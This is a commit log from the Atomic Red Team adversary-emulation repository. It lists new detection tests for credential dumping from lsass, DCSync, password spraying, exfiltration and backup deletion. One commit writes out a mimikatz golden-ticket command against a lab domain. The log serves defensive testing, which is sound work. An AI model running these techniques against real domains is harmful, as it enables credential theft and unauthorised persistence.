security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
2,519 Commits 47 Branches 0 Tags
373176bcba85f4ae978b2cd24c06cfd85fe327d5
Commit Graph

2519 Commits

This Branch
This Branch
All Branches
Author SHA1 Message Date
Michael Haag 373176bcba T1490 - WBAdmin (#1375) 
* Added wbadmin delete systemstatebackup

* Update T1490.yaml

Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com>
 2021-01-23 17:53:20 -07:00
CircleCI Atomic Red Team doc generator 57ba7350b8 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-22 16:30:47 +00:00
MrOrOneEquals1 22c65f4acd Fix to Cleanup Command for T1003.002 Test Number 3 (#1374) 2021-01-22 09:30:13 -07:00
CircleCI Atomic Red Team doc generator 7570e02911 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-21 18:48:01 +00:00
BlueTeamOps 89de74b637 Updated Offline Credential Theft with mimikatz (#1373) 
Updated the command segment related to guid: 453acf13-1dbd-47d7-b28a-172ce9228023
Existing request URL path doesn't exist in gentilkiwi's repo. Added code segment will obtain the latest mimikatz_trunk.zip from the repo.
I have repurposed the code segment done by Xiang ZHU https://copdips.com/2019/12/Using-Powershell-to-retrieve-latest-package-url-from-github-releases.html to meet the requirements here.

Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com>
 2021-01-21 11:47:28 -07:00
CircleCI Atomic Red Team doc generator 05d2071e23 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-20 23:27:31 +00:00
CircleCI Atomic Red Team GUID generator 52945641c0 Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-20 23:27:23 +00:00
Carrie Roberts 63d1e555d4 MSbuild inline task using Visual Basic (#1371) 
* add visual basic test

* correct comment
 2021-01-20 16:26:45 -07:00
CircleCI Atomic Red Team doc generator bc705cb7aa Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-13 19:14:46 +00:00
Carrie Roberts 1f26ebdb6c typo corrections (#1367) 
addresses issues #1365

Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com>
 2021-01-13 12:14:14 -07:00
CircleCI Atomic Red Team doc generator fca809efa6 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-13 19:12:56 +00:00
Carrie Roberts 5c52612858 added details to the description (#1366) 
Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com>
 2021-01-13 12:12:24 -07:00
CircleCI Atomic Red Team doc generator be8d3644f2 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-13 19:11:35 +00:00
CircleCI Atomic Red Team GUID generator 06ce6b9f11 Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-13 19:11:27 +00:00
JimmyAstle 030040bf73 Out minidump (#1368) 
* Adding a test of Out-Minidump.ps1

Adding in a credential dumping test that leverages Out-Minidump.ps1 to dump the contents of lsass to disk for offline extraction

* Fixing cleanup path

Path is actually %TEMP%

Co-authored-by: jimmy astle <jastle@vmware.com>
 2021-01-13 12:11:12 -07:00
CircleCI Atomic Red Team doc generator 471d30b4f3 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-13 03:23:42 +00:00
Brian Thacker 3f8e909392 T1560.001 prereqs tests1 2 4 (#1363) 
* Update T1560.001.yaml

Changed Test 1 to do a silent install of winrar. Added prereqs to Test 2 to install winrar.

* Update T1560.001.yaml

Added prereq commands to Test 4 to download and install 7zip.

* Update T1560.001.yaml

changed command in test 4 to stop endlessly adding to archive new files

* Update T1560.001.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
 2021-01-12 20:22:57 -07:00
CircleCI Atomic Red Team doc generator 371eb3d609 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-11 03:40:28 +00:00
Brian Thacker fa7f19ad7f Update T1218.010.yaml (#1364) 
Fix typo in command to avoid errors
 2021-01-10 20:30:57 -07:00
CircleCI Atomic Red Team doc generator 9c1f9f733c Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-08 16:51:05 +00:00
Clément Notin 18087c9ad8 Add DCShadow args for attribute and value (#1362) 
It gives more choice in what to change instead of fixed "badpwdcount" and "9999"
Also rename "user" to "object" as it is more generic than only user objects
 2021-01-08 09:50:18 -07:00
CircleCI Atomic Red Team doc generator 96f61076f9 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-08 16:42:27 +00:00
CircleCI Atomic Red Team GUID generator 79f6986b1a Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-08 16:42:19 +00:00
Itamar 42472533fa Update T1048.003.yaml (#1357) 
Hi,

I added two atomic tests for exfiltration using HTTP and SMTP.
1. Exfiltration Over Alternative Protocol - HTTP
2. Exfiltration Over Alternative Protocol - SMTP

Itamar

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
 2021-01-08 09:41:50 -07:00
CircleCI Atomic Red Team doc generator c21c1ba13e Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-08 16:23:16 +00:00
Michael Haag a5af0cc644 Update T1218.010.yaml (#1359) 
Modified T1218.010 to allow for modification of path and name of regsvr32.exe

Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
 2021-01-08 09:22:48 -07:00
Michael Haag bbcf685889 Update T1055.cs (#1361) 
dll was named incorrectly in .cs. Fixed and confirmed operational.

Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
 2021-01-08 09:19:55 -07:00
CircleCI Atomic Red Team doc generator c0591491f1 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-08 16:16:04 +00:00
Michael Haag 39954ec1af Update T1218.yaml (#1360) 
Updated microsoft.workflow.compiler.exe test

Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
 2021-01-08 09:15:29 -07:00
CircleCI Atomic Red Team doc generator 9660d0a33e Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-08 16:12:45 +00:00
CircleCI Atomic Red Team GUID generator abfd1e042b Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-08 16:12:36 +00:00
Ama Smuggle Avocados d721e09ede Scriptcontrol (#1348) 
* initial

* updates

* initial

* update

* updates

* updates

* updates

* updates

* updates

* updates

* updates

* updates

* updates

* updates

* Update T1204.002.yaml

* Update T1204.002.yaml

* updates

* remove code

* correct url

* works with 32bit Chrome, simplified commands

Co-authored-by: avocado <avocados@smuggler.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
 2021-01-08 09:12:14 -07:00
CircleCI Atomic Red Team doc generator 5cc2b5a88d Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-07 16:43:14 +00:00
CircleCI Atomic Red Team GUID generator ed7d3faabd Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-07 16:43:06 +00:00
Carrie Roberts 6f40ae85f5 solarigate atomic (#1358) 2021-01-07 09:42:43 -07:00
CircleCI Atomic Red Team doc generator fb179a30a8 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-06 19:39:15 +00:00
CircleCI Atomic Red Team GUID generator a3ad539a58 Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-06 19:39:08 +00:00
Clément Notin 7c1471c403 T1110.001: add test "Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)" (#1354) 
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>

Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
 2021-01-06 12:38:52 -07:00
CircleCI Atomic Red Team doc generator 4dbcb20934 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-06 18:51:58 +00:00
CircleCI Atomic Red Team GUID generator a4ca274d7d Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-06 18:51:49 +00:00
Clément Notin c71444f1dc T1110.003: add test "Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)" (#1349) 
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>

Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
 2021-01-06 11:51:31 -07:00
CircleCI Atomic Red Team doc generator 0b9d36e786 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-06 18:47:31 +00:00
CircleCI Atomic Red Team GUID generator 9a59eac0b8 Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-06 18:47:22 +00:00
Clément Notin d5b6e69f89 T1003.006: add DCSync test (#1352) 
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>

Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
 2021-01-06 11:46:59 -07:00
CircleCI Atomic Red Team doc generator 603040c6e3 Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-06 18:42:39 +00:00
CircleCI Atomic Red Team GUID generator 90611a079a Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-06 18:42:30 +00:00
Clément Notin b0a0bbc66e T1055: add new test "Remote Process Injection in LSASS via mimikatz" (#1353) 
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>

Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
 2021-01-06 11:42:08 -07:00
CircleCI Atomic Red Team doc generator 443e0318fc Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-06 18:35:50 +00:00
CircleCI Atomic Red Team GUID generator 7ef584f9fd Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] 2021-01-06 18:35:42 +00:00
Clément Notin d50239ff57 T1558.001: add test "Golden ticket" (#1351) 
* T1558.001: add test "Golden ticket"

Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>

* Add support for default domain SID (one less parameter to specify)

With default:
invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" }
[...]
mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:S-1-5-21-1891480667-311803191-3341389180 /aes256:xxxxx /user:goldenticketfakeuser /ptt

With specific SID ("toto"):
invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" ; "domain_sid"="toto" }
[...]
mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:toto /aes256:xxxxx /user:goldenticketfakeuser /ptt

Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
 2021-01-06 11:35:14 -07:00